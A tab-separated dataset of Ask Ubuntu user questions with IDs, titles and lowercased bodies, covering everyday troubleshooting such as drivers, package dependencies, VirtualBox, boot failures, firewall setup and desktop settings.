98344	fat fonts in kubuntu	in kubuntu ( both precise and oneiric ) the font rendering is really different from gnome . the ubuntu font is not well displayed because it is always used the bold one instead of 'regular ' resulting in a fat interface . is there a way to fix this ?
98346	display sleeps despite system 's settings	i have disabled display sleep in every way i know : system settings > screen disabling xscreensaver ( not enabled by default , but double-checked ) browsing the bios settings yet my display always sleeps after 15 minutes or so . what can i do ? i am running ubuntu 11.10 with a 64-bit processor . i use gnome shell . my computer is a dell xps m1530 .
98348	how to copy region of text in some app ( like using alt key in some win apps ) ?	in windows , when i want to copy some region of text i press alt key and then mark the region with mouse . if i try to do this in ubuntu , then i activate the move screen command . how can i achieve the same effect in ubuntu ? it 's funny , but i can to find this on google , thou is seems to be very useful feature .
98351	glib huge errors on fresh 11.10	i have just very fresh install of 11.10 64bit on my 3ghz dual core machine . graphic card nvidia 9600gt with the 290.10 driver . desktop crashes or will be not redraw correctly . its very instable with using skype or log file viewer and other applications . i get massiv error outputs in xsession-error log related to gdk or glib . i was using ubuntu 10.04 64bit without any problenms long time , i was also using the same graphic driver without any problems and compiz was running successful . this is an example of such error output from just a few minuts using desktop after reboot : xsession-errors log is it possible to fix it ? also cpu usage is so much higer as before . what if want to start 3d rendering ? or my other cpu intensiv applications ? how should i make it with such a values ? i have now just skype and google-chrome and log viewer on and cpu usage is 50 % . i feel bad . regards so slowly i dont know what to think . so how you suggest i made again new fresh installation . now i didnt take the newest nvidia driver but this one from the repository 280.13 . cpu values seams to be normal now but look please on the output of xsession-errors : link . my system is 2 min old up to date , no ppa in the packadge management . absolutly clean . i am runing just firefox + log viewer.just btw . it was 7th installation of this system . i dont get it to normal state . why ? my graphic card is supported . i was runing this card on the newest driver already and made fantastic 3d renderings on it . what can i do else as to take onother distro ? is it possible to fix this problem ? i dont want to give up ubuntu . it was long long time my favorit system . my graphic driver is not loaded : enter link description here why ? btw . also i cant give comments here on askubuntu ... i was forced to make answar on my own quastion
98353	key differences between 10.04 lts ( lynx ) and 12.04 lts ( pangolin ) that would matter to programmers ?	i have a 10.04 image from vmplanet which i am very accustomed to , for my development work which revolves mainly around java , git and rails ( using rvm ) . i did n't like the unity interface so i did not seriously consider an upgrade to the 11.x versions , but now that a fair amount of time has passed and another lts might be round the corner , i am trying to find out if there are other benefits in upgrading , or pitfalls i should avoid . edit : i am also interested in factors relating to interoperability with windows ( either as an image or native install ) , i.e . file/folder sharing , networking
98354	how to make possible to install samsung kies ?	i am not sure where this question is set to proper place or not . if not then please guide me to that place . i have a samsung galaxy sii , and doing android development . a couple of days before i was using windows os , but now i am using ubuntu . in windows i am able to debug my android app into galaxy sii with the help of samsung kies , but i am not able to do this in ubuntu . so what is the alternate of it for ubuntu . i have googled many times but still not get kies that support for ubuntu .
98359	does the update manager have a log ?	if update manager has a log of updates installed , where can i find it ? alternatively , is there a list of these online somewhere ?
98362	how can i install drivers for an intel 82915g/gv/910gl ?	i installed ubuntu to try it in my computer and i 'm in love with it , but it doesnâ´t recognize my intel 82915g/gv/910gl express chipset family integrated , i need help to do this , because i 'm new to this os . i tried to find drivers using additional drivers , and sudo apt-get update & & sudo apt-get install xserver-xorg-video-intel this tells me i already have the lastest version . can somebody help me to install this driver ?
98376	playmidi /dev/sequencer not found	playmidi midi.mid does not play , but gives the following error : playmidi /dev/sequencer not found . how can this be resolved ? by the way , i am using ubuntu 10.10 . totem movie player does play midi files . i want to use playmidi to be able to select channels from the midi file . to my knowledge that is not possible with totem . update : i followd amith his suggestion . sudo modprobe snd_hda_codec_atihdmi snd_hda_codec_idt snd_hda_intel snd_seq_midi snd_hda_codec snd_hwdep snd_rawmidi snd_pcm snd_seq_midi_event snd_seq snd_timer snd_seq_device snd soundcore snd_page_alloc these are all modules that are listed in lsmod |grep snd running playmidi gives the same error still .
98377	how to hide terminal output when executing a command ?	when i launch certain programs from the command line like eclipse and document viewer in 11.10 it spews a load of information that seems inconsequential . also when they are run in the background they sometimes continue to produce output to the terminal which i am currently working on , which is irritating . i would like them just launch and keep the background stuff in the background . my reasoning is that if you launch these programs through the gui ( eg double clicking on an icon ) these messages are never shown to me , so i do n't need them in the command line .
98382	advanced disk usage analyzing software ?	i ca n't really find a great disk analyzing software for ubuntu . the default apps in ubuntu , baobab ( and df -h ) do work , but there are no advanced features . what i am looking for is like glary utilities disk analysis , to search for those file that take too much disk space .
98383	synaptics touchpad keeps getting disabled	i have a samsung r780 laptop with synaptics touchpad that 's been working fine since i installed 11.10 back in october . now it 's stopped working , this suddenly happened today but i have n't had an update since a couple of days ago so no idea what triggered it . symptoms are the touchpad works fine at the login screen , but as soon as i login and the desktop appears it stops working . a usb mouse works ok i 've tracked it down ( i think ) to gnome-settings-daemon . i have turned off `` disable-while-typing '' using gsettings set org.gnome.settings-daemon.peripherals.touchpad disable-while-typing false if i run xinput watch-props `` synps/2 synaptics touchpad '' in one terminal , and then run xinput set-prop `` synps/2 synaptics touchpad '' `` device enabled '' 1 in another terminal , the touchpad is enabled for a few seconds , and then something else disables it again , here 's the messages from xinput watch-props : property 'device enabled ' changed . device enabled ( 143 ) : 1 property 'synaptics tap action ' changed . synaptics tap action ( 303 ) : 0 , 0 , 0 , 0 , 0 , 0 , 0 property 'synaptics edge scrolling ' changed . synaptics edge scrolling ( 294 ) : 0 , 0 , 0 property 'synaptics two-finger scrolling ' changed . synaptics two-finger scrolling ( 295 ) : 0 , 0 property 'synaptics edge scrolling ' changed . synaptics edge scrolling ( 294 ) : 0 , 0 , 0 property 'synaptics two-finger scrolling ' changed . synaptics two-finger scrolling ( 295 ) : 0 , 0 property 'device enabled ' changed . device enabled ( 143 ) : 0 so something ( i believe gnome-daemon-settings ) keeps disabling it . if i 'm quick i can move the mouse for a couple of seconds after enabling it so i 'm sure this is the problem . also , if i switch to a virtual terminal ( ctrl+alt+f1 ) and back to x again the touchpad is enabled for a couple of seconds before it gets disabled again . i ca n't see any settings in gconf-editor that would cause this , also i have no idea why it suddenly started happening . this behaviour happens consistently between reboots now . it 's the same whether i run unity or gnome shell so not specific to any window manager . am i doing something stupid , or should i file a bug report ?
98387	10.10 to 11.04 upgrade unmet dependencies	i was trying to upgrade my system from 10.10 to 11.04 . the following packages have unmet dependencies : plymouth : depends : libdrm-nouveau1a ( > = 2.4.23 ) but it is not installed depends : libplymouth2 ( = 0.8.2-2ubuntu22 ) but 0.8.2-2ubuntu5.1 is installed plymouth-label : depends : libplymouth2 ( = 0.8.2-2ubuntu23 ) but 0.8.2-2ubuntu5.1 is installed depends : plymouth ( = 0.8.2-2ubuntu23 ) but 0.8.2-2ubuntu22 is installed plymouth-x11 : depends : plymouth ( = 0.8.2-2ubuntu5.1 ) but 0.8.2-2ubuntu22 is installed e : unmet dependencies . try using -f. when i do apt-get -f install , i get the same errors alongwith two more lines : e : error , pkgproblemresolver : :resolve generated breaks , this may be caused by held packages . e : unable to correct dependencies now , i am unable to install , remove or upgrade or do anything . how do i solve this , atleast how do i force enable my system to install , remove stuff . more : i have also tried dpkg configure and also tried to purge remove plymouth for starters . but nothing works . update : also , i have tried removing all the ppas which included xorg-edgers which probably has caused some issues . but not having/having that ppa in sources.list.d changes nothing .
98393	how do i get 2560x1440 resolution within virtualbox on a mac ?	i 'm trying to get a functional ubuntu instance running in virtualbox on my imac 27 '' . the imac has a resolution of 2560x1440 , and i 'd like to run ubuntu in full screen at that resolution . i 've installed the guest additions that come with virtualbox ( rather than the ones in the archive ) . i 'm using ubuntu 11.10 64 bit . the display currently runs at 1600x1200 , and when i run the displays dialog ( or xrandr ) , i get a list of resolutions that are 1600x1200 or smaller , and are all at 4:3 aspect ratio ( whereas the imac monitor is 16:9 ) . the settings for the virtual machine have video memory set to 128mb . whether i run the vm with or without 3d acceleration makes no difference to the available resolutions ( although with 3d acceleration enabled , launched windows are n't visible â a different question perhaps ) . i have a natty virtualbox vm that does run at 2560x1440 , so i know it 's possible . however , i do n't know how to achieve it . thanks , jml
98395	how do i preserve lvm while changing the physical disk ?	i had a problem with vm virtual disk used in lvm and i cloned it somewhere in the datastore with vmktools and then i want to use it same place instead of old one . if i remove the the old disk from vm and add newly created clone disk , does lvm continue to work without data loss ?
98399	move `` computer '' above `` bookmarks '' in nautilus sidebar	i 'd like to move the `` computer '' section of nautilus ' sidebar above the `` bookmarks '' section , as currently the `` home '' , `` desktop '' , etc links are pushed to the bottom of the sidebar . is this possible ?
98403	compressing part of filesystem a second time	i have a laptop running ubuntu 11.10 . i 've replaced the hdd with a 120gb ssd , and to save some precious disk space i utilized one of steve hanov 's tips for optimizing ubuntu to run on a usb key or sd card ; specifically , i implemented his third tip , and compressed /usr to a squashfs read-only volume mounted with a normal rw volume using unionfs . now , i 've installed another space-heavy program , and i 'd like to repeat the procedure . however , i do n't know how to ... i ca n't inflate the squashfs volume to get to square one and do the same thing again , simply because there 's not enough space on my drive left for that . how do i go from where i am now to ( approximately ) where i would be if i had applied the space-saving tip the first time today ?
98407	how to update zend server community ?	i have ubuntu 11.10 and zend-server 5.3.8-zs5.5.0 . so i would like to update it time by time . but i do n't even know which packages it uses . if i do apt-get update it does n't help .
98408	how to customize icons for running applications ( seen in alt-tab ) ?	i often have many terminal windows open and switch between them with alt-tab . right now , they are all shown as the black `` utilities-terminal '' icon . i would like to customize the icons so i can easily switch between them - how ? i 've tried creating custom .desktop entries and changing the icon there . but , that only changes the icon to launch the terminal . once running , it is shown as normal icon again .
98412	i add a ppa but the software does not show up in ubuntu 11.10 updates nor software centre	every time i add a ppa i can not see the package i 'm trying to install . i suppose i must be doing something wrong ! so here 's my latest effort : in a terminal i typed : sudo add-apt-repository ppa : jeromerobert/misc and that seemed to work correctly then i typed : sudo apt-get update but when i go to synaptic or software center the application i want to install is not there . could someone please tell me what i 'm doing wrong ?
98416	error : kernel headers not found . ( but they are in place )	i 'm trying to install the guest additions in virtualbox 4.04 . host os is ubuntu desktop 11.04 64bit , guest os is ubuntu server 11.10 64bit . $ sudo ./vboxlinuxadditions.run after some output this line is printed : the headers for the current running kernel were not found . but the headers are installed , at least accordingly to dpkg : $ dpkg -- get-selections | grep linux-headers linux-headers-3.0.0-12 install linux-headers-3.0.0-12-server install linux-headers-server install the running kernel is : $ uname -a linux foobar 3.0.0-12-server # 20-ubuntu smp fri oct 7 16:36:30 utc 2011 x86_64 x86_64 x86_64 gnu/linux how do i fix things so that guest additions installer is able to find kernel headers ? update : added full output . the headers for the current running kernel were not found . if the module compilation fails then this could be the reason . building the main guest additions module ... done . building the shared folder support module ... fail ! ( look at /var/log/vboxadd-install.log to find out what went wrong ) installing the window system drivers ... fails ! ( could not find the x.org or xfree86 window system ) . i do n't care for fail # 2 , because that 's a server and i do n't need x server . but i need shared folder support . some further detail : $ tail /val/log/vboxadd-install.log ... ... ... . cc1 : some warnings being treated as errors make [ 2 ] : *** [ /tmp/vbox.0/vfsmod.o ] error 1 make [ 1 ] : *** [ _module_/tmp/vbox.0 ] error 2 make : *** [ vboxsf ] error 2
98417	open desktop via lan	i have a desktop and a laptop both with ubuntu ( ubuntu 10.04.3 lts ) on board . i installed openssh server on desktop and now i 'm able to connect to this from my laptop ( also running ubuntu ) by typing ssh -x this allows me to run programs on the desktop and display their windows on the laptop . i 'm wandering if it is also possible to run gdm on the desktop and display and control it by the laptop , so that if there is e.g . an update notice i see it , etc. ? i 'm not talking about the normal remote desktop which sends screenshots , because it 's too slow .
98432	what version of unity will be used in 12.04	as the question goes , at the end , what version of unity will be used in 12.04 for the final release . will it keep on with the 4.x or will it use 5.x
98433	run a script on login using ~/.bash_login	i need to run a script when i login and logout in my ubuntu . i tried to put the script in my ~/.bash_login but it did n't work . is there a better location where i can run my script ? my script is located in /home/gsd/script/login.sh and it 's executable . edit : my script runs when i type : /home/gsd/script/login.sh and it set with +x now , i only have : touch /home/gsd/test.txt in the ~/.bash_login to test . the file test.txt is never created edit 2 : gsd @ laptop : ~ $ ll ~/.bash* -rw -- -- -- - 1 gsd gsd 38639 2012-01-25 17:25 .bash_history -rw-r -- r -- 1 gsd gsd 29 2012-01-25 15:22 .bash_login -rw-r -- r -- 1 gsd gsd 220 2011-11-03 19:22 .bash_logout -rw-r -- r -- 1 gsd gsd 3136 2011-11-04 08:00 .bashrc
98437	does any tv work with ubuntu tv or only specific ones ( hardware requirements )	i have a 1080p tv and was wondering if there is some kind of specific hardware for ubuntu tv or any technical specifications for it that i should know . will it work correctly with a 1080p tv with hdmi or does it work with only a group of tvs . what are the hardware requirements to use ubuntu tv ?
98438	iphone 3g does not see transferred songs	please help ! ive transferred a few songs to my iphone 3g 8gb phone using a variety of apps . rhythmbox and also gtkpod . both transfer the songs to my cell just fine , but when i try to view them on the phone ... they do n't show . they must be there , because if i plug the phone into another computer i can see the songs and transfer them to the computer using rhythmbox . my drive time to work just went from 15 minutes one way to an hour and half and talk radio is killing me : ) id really appreciate any tips i could do to get my songs showing on the phone . i have the iphone software update 5.0 so its fairly new . i have done a few tips from other questions like installing libimobiledevice , but to no avail .
98439	change desktop from command line	i recently upgraded from 10.04 lts to 11.10 . i use this machine remotely via nomachine during the day and had some issues with unity so i switched the desktop to gnome while at home last evening . it worked fine , but when i 'm using nomachine the applications menu is missing from the top toolbar . i would like to switch it back to unity , but it logs directly into the desktop without being able to set the desktop option . i 'm guessing the desktop setting is contained in a file and i can edit it via ssh shell and vim , but have no clue where the file is or what it 's called . any suggestions ?
98443	encrypting files and folder through terminal	i am new to part of encryption on ubuntu . is there any way to encrypt files and folder with password from terminal ? without using truecrypt or cryptkeeper etc .
98444	100 % cpu usage in ubuntu 11.10	i recently installed ubuntu 11.10 with unity to dual boot with windows 7 on my lap top . my laptop is running an intel i7 quad-core and 8gb of ram just as some background . i 've noticed that when i 'm running ubuntu , my computer heats up a lot more than windows 7 and it seems like the battery life is a lot shorter . using system monitor , i 've seen that my computer goes through cycles of having 100 % cpu usage to 20 % to 1-3 % and then back to 100 % cpu usage . it does not , however , list the process that is eating up all this cpu ( though occasionally , the gnome-system-monitor process is using 20 % of my cpu ) . i was wondering what the problem is here ? is it a problem with unity ? or is there something else going on ? mostly , when this is happening , i 'm just using chrome or firefox , or empathy . whats happening ?
98446	passwords in the password/encryption keys program	i noticed that i have passwords in the password/encryption keys program . it appears that anybody who walked up to my computer could go look at all my passwords without needing a master password . did i do something wrong or is this the default behavior ? and if so , why ? and what if i lock my password is it get locked till i log out or for every time when i have 2to see password then i have to unlock keyrings . if then so how i protect my passwords from other . and why it is done so
98448	optirun bumblebee crash	whenever i try to run some programs under bumblebee with optirun they crash before displaying any window . i particularly try to run supermeatboy because it does n't support intel cards , but with bumblebee it does n't get even to displaying a window unlike the intel one and crashes prematurely . i 've attached the xorg log . http : //paste.pocoo.org/show/540542/ thanks in advance , nikita .
98450	gpg and ssh encryption of file need help	i do n't know how to use password and keys in ubuntu 11.10 , what is the exactly use of this application , and how can we use this for encrypting files ? please also explain about ssh keys and gpg keys ? i read help from application but its does n't go in my mind what it is all about . i have found one interesting link here . it has helped me some but i still i have doubts . kindly make me understand in simple and short way .
98451	gedit from terminal - inconsistent behaviour	i tend to frequently open a text file from the terminal with a command like so : gedit filename.txt however , the behaviour is inconsistent ; sometimes , the focus will leave the terminal and will not return until i have closed the file . other times , the terminal will maintain a prompt , as if i had run : gedit filename.txt & why this discrepancy ?
98452	inserting an image into a pdf	are there linux/ubuntu programs capable of inserting a partially transparent image into a pdf ? i 'm trying to `` sign '' a pdf document by inserting an image of my signature , but even though every osx and windows pdf editor seems to support this , i have n't found any linux pdf editors that do . i 've tried pdfchain , pdf editor , flpsed pdf annotator , openoffice , scribus , krita , and pdfsam , and none support this . although not technically a linux program , i tried the site pdfescape.com , but it corrupts the images it inserts , rendering it useless for this task . note , i 'm talking about keeping the pdf in pdf format , so rasterizing it to a tif/png/bmp , editing it in gimp , and then dumping it back into a pdf is n't a solution . edit : i might have been premature in my criticism of pdfescape.com and pdf editor . i was viewing the resulting pdf in evince , which was showing a mangled image , but when i opened the pdf in pdf editor , the image rendered correctly . i 've since sent the pdf to someone on windows who confirmed the image showed correctly . it looks like the problem might be inaccurate rendering with evince .
98453	banshee intergration with xubuntu	i am using banshee on xubuntu 11.10 and i face few problems : banshee does not appear on the panel when iconified ( reported as bug 668670 ) ; banshee bindings with my [ play/pause ] [ stop ] [ pre ] [ next ] buttons is not consistent . ( sometimes it controls banshee and some other times it does n't ) ( reported as bug 668671 ) . are these bugs or merely configuration issues ?
98454	booting ubuntu on an uefi system with windows 8	i have a preview windows 8 from a friend and right now i am downloading the iso from 12.04 alpha . i want to know if i will be able to boot ubuntu from the same pc that has windows 8 taking into consideration that the motherboard has uefi . i ask because of the whole windows 8 blocking other os 's issue .
98455	x86 or x64 for amd e-300 and 4 gb of ram ?	so i have a machine with amd e-300 ( http : //www.cpu-world.com/cpus/bobcat/amd-e % 20series % 20e-300.html ) , and 4096 megabytes of ram memory , 3712 mb usable , because the integrated gpu takes 384 mb . what should i use , considering that it is an x64 cpu ? should i go with the x64 version of xubuntu/lubuntu , or with the 32bit/x86 one ? would my machine perform better with the x64 ?
98460	imagemagick convert command	i have question regarding the convert and linux command in generate . i need to convert images using imagemagick i do : convert -quiet -regard-warnings image.jpg -colorspace rgb +repage /tmp/tempfile.img that works now , when i do : convert $ tmpa1 -median 2 -clut $ tmpa2 i get : convert : missing an image filename `/tmp/cartoon_2_17950.mpc ' @ error/convert.c/convertimagecommand/2970 . after 3 day of searching i found this : convert \ ( $ tmpa1 -median 2 \ ) -clut $ tmpa2 and it works what is the purpose of the ( and ) ? ?
98462	ubuntu does not boot after bad shutdown	i recently swapped from windows7 to ubuntu 11.10 due to problems with my windows . ubuntu worked great for a few days with no problem , this morning i ran out of battery and the laptop shut down . i rebooted it and now it just displays an error message ( black screen with coding commands ) it does n't even go onto the purple screen anymore . any help on this would be much appreciated.. ps : would installing ubuntu again make any difference ?
98463	computer shudown during upgrade , ubuntu not booting	my computer shutdown because of critical temperature reached . i was upgrading my ubuntu 11.04 to 11.10 . now , ubuntu is not starting up .
98470	clementine tracks not dragging in playlist	i just upgraded to 11.10 with unity . for some reason , when i try to drag a track to change the order , the cursor turns to a no sign and wo n't let me move the track . this happens when dragging from my collection to the playlist area as well , unless i put it in the beginning of the playlist . is this a unity thing ? has anyone else experienced this ?
98473	is unity 5.0 ready to use now ?	it seems relatively stable in videos and it is n't like the version of unity i 'm using in 11.10 is the most rock solid either , i have to restart it once in a while . is there any reason i would not want to be using unity 5.0 right now ?
98478	error from ksplice cron job	i 'm running ksplice on ubuntu 11.10 64 bit and i get the following error when the ksplice cron job runs . $ export path=/usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin & & [ -x /usr/sbin/uptrack-upgrade ] & & /usr/sbin/uptrack-upgrade -- cron gconf-warning ** : client failed to connect to the d-bus daemon : unable to autolaunch a dbus-daemon without a $ display for x11 when i run the command manually as root i get no output and a return value of 0 . does anyone know a fix or if this error can just be ignored ?
98479	problem : qt-gtk-engine	i need to install this package in my ubuntu 11.10 oneric ocelot . but , as i understand - this is obsolete now . but how can i install gtk+ engine for qt ?
98482	ubuntu 11.10 pdf booklet format wo n't print	i have acroread ( 64 bit ) installed on ubuntu 11.10 and when trying to print a pdf document in booklet format it just sits there in the print queue on a hp deskjet 8500 saying `` processng '' . before when i was using ubuntu 10.10 it would print without any problems . any ideas ?
98487	i386 deb package for amd64 machines	i am building an application and i want to build a deb package , but i have a problem ... i want that the deb package can be installed both 32 bits machines and 64 bits machines . then i build a 32 bits package to support both architectures , but i have problems with the dependencies , when a 32 bits system installs the package , works good , but when a 64 bits system installs the package , the dependencies ( shared libraries ) to be installed should be the 32 bits ones ( available on 64 bits repos . ) how can i accomplish that ?
98489	how can i elevate nautilus privileges to move or copy a folder as root ?	say i have a folder open in nautilus that 's in my /home/user/temp directory . i 'd like to move a folder from there to my /opt directory ( it 's a program ) . is there a way i can elevate the copy command up to a sudo so that i can copy the folder without having to start a new instance of nautilus from the command line ?
98493	ubuntu to make commercial software	hi i 'm new in ubuntu and i have one question . in this post : can i legally use ubuntu server to create a commercial web application on amazon ec2 ? some one ask `` can ubuntu server on amazon ec2 be used as a host os for commercial web application ? '' but my question is : can i use ubuntu as operating system do make my own commercial application ( commercial closed license ) for an example in java ? spring ? groovy ? grails ? anything else ?
98507	what video card should i use with ubuntu for a 27 inch monitor ( color managed ) ?	i want to buy a 27 inch monitor with a resolution of 2560x1440 . i will use it for photography , so color management is very important . my current nvidia driver does n't allow color management in unity ( ubuntu 11.10 ) . what video card should i buy to allow a color managed display with a resolution of 2560x1440 ?
98513	ubuntu cd not bootable	i downloaded 11.10 , and extracted it to a flash drive . now when i am booting it off the flash drive , it goes straight to windows . i burnt the files onto a dvd and the same thing happens . it does n't boot from the dvd . i tried a 11.04 cd and the computer boots from it no problem , which means , my computer is capable of booting from external devices . but form some strange reason , it is n't booting from the devices that has 11.10 on it . please help ! !
98515	how can i view the number of files in each folder in ubuntu one folder ?	i think , it would be nice , to see the number of files in each folder , to know if the synchronization of ubuntu one is finished or not .
98517	start session iceauthority	today i ca n't enter in my session , ubuntu say me `` could not update /home/user/.iceauthority '' i looking for in internet and i do this step chown user : user /home/user/.iceauthority chmod 644 /home/user/.iceauthority but did n't solved the problem .
98523	ubuntu-tv app development	are there guides/wikis on how to get started with ubuntu tv app development ? are there existing apps out there , i have only seen youtube . i have some experience working with boxee apps and was wondering if its similar .
98524	how to render 3d models as svg vector graphics ? ( planar projection )	this image ( original svg from wikipedia , public domain ) was created using the following procedure : create a 3d model in google sketchup export as pdf import in inkscape save as svg is there a straightforward way to produce such a svg with software that runs ( natively ) on ubuntu ? ( pantograph , a blender plugin , has only broken download links ; vrm , another blender plugin works with belnder 2.4x , but not with blender 2.6x . )
98526	changing ownership of read-only file system	i did read the several posts available here on `` changing ownership of read-only file systems '' but they do n't seem to help me . my external hard drive ( which i had previously formatted in os x and used on it for over a year ) does n't allow me to copy anything from/on to it from my ubuntu 11.10 it says that the file system is read only when i try this : sudo chown -r my-user-name / '' untitled 1 '' where `` untitled 1 '' is the name of the external hdd . any suggestions ? even getting into nautilius with sudo nautilius to change the ownership did n't work . ( on a side note , what is nautilius anyway ? i know i can google that ) what should i do now ?
98527	how to recover disk space that is not visibly available ?	i have an ubuntu 11.04 64 bit development image running on virtualbox . i have been doing some house keeping on the disk space because it was getting low . the drive is a 26gb drive . i have about 4.7 gb going to swap . that leaves about 21 gb of total space . i ran the disk utilization software and discovered some of the folders that were taking up too much space and deleted them . i also ran aptitude cleanup commands which freed about another 1 gb of space . now i am sitting on 10.5 gb of used space . ( displayed in the disk usage analyzer ) nautilus is only displaying about 7.5gb free space on the drive . that does n't make sense in my mind . 21 minus 10.5 is not 7.5 . i wanted to make sure that those tools were not showing incorrect information so i ran a df -h. that displays 11g used and the size of the drive 20g . 7.5 available . that still leaves a discrepancy of 1.5 gb . i know you ca n't get exact but that discrepancy is huge . is there anything that i could be missing ?
98531	how can i change font rendering to sub-pixel bgr ordering ?	in ubuntu 11.10 , i ca n't find a way to change the sub-pixel byte ordering to bgr . i have a bgr monitor and fonts look blurry because of this . i 've installed gnome-tweak-tool but i ca n't find an option for the sub-pixel ordering . this used to be easy to do with the old font settings window .
98532	k3b is missing vcdxbuild vcdxminfo and vcdxrip , how can i install it ?	i ca n't install this programs using apt-get , i think i have to add the package . by the way , how can i find the packages for new softwares when i have only the software name ? google is not helping much on this ( i did a search for vcdxbuild , and found nothing useful ) ..
98534	nautilus does n't display contents of the home folder when launched as root	it shows the desktop symbol but it does n't show the files on my desktop neither . i 'm running ubuntu 11.10 with gnome shell .
98537	how do i find bluetooth in my bios ?	i want to permanently disable bluetooth , which i ca n't seem to do from the os anymore . i 've read that i need to make the change in my bios but i 've gone through every setting in the bios and i do n't see anything that rhymes with bluetooth . how do i stop it from launching on startup ?
98545	problem with ubuntu software center download rate	when i download something from the ubuntu software center , it usually downloads at about a 40kb/s speed . thing is , i can download things from the internet at 1mb/s+ and sometimes as high as 2.2mb/s . why is it so slow ? is there anything i can do to speed it up ?
98549	how to fix `` k3b can only copy cd-extra mixed mode cds '' error ?	i 'm trying to make a backup ( an iso image ) of an old cd , but i 'm getting the error message `` k3b can only copy cd-extra mixed mode cds '' , any idea how to fix it ? i saw in a forum telling to check the missing programs on the configurations , but nothing is missing now and i 'm still getting this error . using k3b 2.0.2 , and ubuntu 11.10 .
98551	how to automatically change wallpaper from interfacelift ?	this is something i 'd like to work on . there is this site called interfacelift which offers really good wallpapers for any screen resolution and is updated regularly . the site which has a google+ page , has agreed to provide beta testers with a mediarss link . is there any way i can use this to allow ubuntu to change my wallpaper automatically to the newest wallpaper submitted on interfacelift ? they somehow use this to create .theme files for windows to create dynamic wallpaper changing . i was wondering if something similar can be done in ubuntu .
98552	unity session broken after installing , uninstalling gnome-shell	i installed gnome-shell and attempted to log in to a gnome session , but there is something wrong with the graphics driver or something ; all animations are accompanied by a lot of fuzz , blocks of random pixels are everywhere , so i decided to switch back . now the default ubuntu session does n't start unity any more . the only session that works as it is supposed to is ubuntu 2d . i 've already followed the advice on the other questions : removed gnome-shell , gnome , gnome-fallback and all associated with it , removed and reinstalled ubuntu-desktop , and it did not help . not sure what is going on here .
98554	securing riak using shorewall firewall	i want to set up a riak cluster for a web project . however , i want to secure this cluster so that only my web server ( s ) can access riak cluster . basically , i will have one or more web servers and 4 riak servers ( in a cluster ) . i want to use shorewall or other firewall app to secure communications between the web server and the riak clusters so that no other servers can access the clusters but my own . being the riak is completely open on the server-side , this is essential before i take my servers into production . i assume i will have to : install shorewall on each of the riak servers lock down all ports initially open port 4369 ( epmd ) and port 8099 ( handoff listener ) on all riak servers + the range of ports defined in my app.config file open port 8098 and 8097 ( for client ) on all riak servers individually restrict access of one riak server to the ip addresses of the other riak servers in the cluster + the ip address ( es ) of my web server ( s ) . repeat for other riak servers in the cluster i can install shorewall , but i 'm not familiar with how to configure shorewall to do the above . i would appreciate some assistance .
98555	should i use use .htaccess to secure wordpress , or can i use the virtual host config file ?	i`m using apache2 on ubuntu 11 . i want to secure my wordpress site with .htaccess rules , but i understand that it is preferable to put the rules in the apache config file ( httpd.conf ) . if i understand correctly , the virtual site config file ( under /etc/apache2/sites-available ) is the config file for my wordpress , and not the main apache config . i want to put mod_rewrite rules on my site , but when i put it in the config file of the virtual host , apache wo n't start ( file to read the rules ) . so , do i have to use .htaccess , or can i use the virtual host config file . ( this is what i want to accomplish : http : //journalxtra.com/websiteadvice/wordpress-security-hardening-htaccess-rules-4025/ )
98558	backup on shutdown	i am developing a system that runs an rsync every 15 min using cron . it rsync 's the users directory to a local backup on another device . i 'd like to also run the rsync on shutdown or reboot . how do i make sure the rsync does n't run after the various unmounts on shutdown / reboot ? for details on the system see http : //balsa.kkoncepts.net
98559	ubuntu server live cd rescue mode ca n't run fsck	i have an ubuntu server virtual machine that crashed and i was forced to reset the virtual machine . when i booted , it did an automatic fsck , but i want to make sure that the filesystem is ok . i have searched for instructions on how to run fsck from an ubuntu live cd , but none of the instructions work ! the version of the ubuntu server live cd is 10.04.2 and when the live cd menu appears i chose `` rescue mode '' . i then went through the questions ( similar to those during installation ) and the final prompt asks you to choose a `` device to use as root file system '' . i read online that i should n't mount the root file system if i want to run fsck , so i chose the option `` do not use a root file system '' . next option i selected was `` execute a shell in the installer environment '' . i now get a command prompt , but when i try to run fsck /dev/sda1 i get `` fsck not found '' . i 'm completely lost and even the `` official ubuntu server 2nd edition '' book does n't explain the procedure properly . i hope someone more knowledgeable can help me out ! thanks .
98561	how to install xubuntu complete version from the terminal ?	i currently use ubuntu 11.10 64bits and would like to switch to xubuntu . if i run the command sudo apt-get install xubuntu-desktop will it install only the desktop environnement ( xfce , if i 'm not mistaking ) or will it install everything like from a xubuntu livecd ? indeed , as i 'm new in the gnu/linux world , i 'm trying several distros and so would like to know if it was possible to proceed that way to install other distros ... thanks !
98562	intel hdgraphics+nvidia gt540m+nouveau working ?	what i´ve learnt is , it´s not a good idea to buy new hardware and use linux because of less support from the producers . machine : lenovoz570 , i7 x64,8gb , 700gb , nvidia optimus+intel , 1366x768 , win7+11.10 ubuntu+kubuntu . until now nvidia is n't installed or used . some problems , which may be related to each other : - kubuntu left after update a nonworking package-manager ( problems with nouveau ) - celestia starts and vanishes into nirvana ( no 3d ? ) - usb-livestick shows non readable screen ( pixel don´t fit together ) - partedmagic6.7 has icons which freeze but don´t work - two grub2 , one inactive on the ubuntu partition and one at mbr really on kubuntu partition - during kubuntu menu config one point is `` science '' but despite show hidden it´s not to see since 3 weeks i 've been trying to get a running machine and i do n't like the fact that is sometimes not booting , gives me black screens and freezing ( it is cold enough outside ) . i know , that my wishes are not standard and i could find a solution by reading several sites for cryptical commands and how to run them on a terminal , but i wanted only a secure and stable runnig machine , not 6 weeks of frustration . i have learnt that switcheroo does n't work with optimus , but bumblebee 3.0 should work . is it a good idea to try this or will it create more problems ? so , heavy stuff , hope somebody understands my german english and prevents any more frustration on my side . thanks in advance .
98566	how do deactivate plymouth boot screen ?	lately , booting ubuntu on my desktop has become seriously slow . we 're talking two minutes . it used to take 10-20 seconds . because of plymouth , i ca n't see what 's going on . i would like to deactivate it , but not really uninstall it . what 's the quickest way to do that ? i 'm using precise , but i suspect a solution for 11.10 would work just as well .
98573	how can i debug what 's failing in a wine application ?	i 've been able to get photoshop cs5 installed on wine . it also runs pretty well , but it throws a fatal exception when starting up : log : http : //paste.ubuntu.com/817056/ using the error log linked above , how can i find out what 's going wrong ? photoshop does n't actually die after this exception , but there are some oddities that occur with the program which i 'd like to troubleshoot .
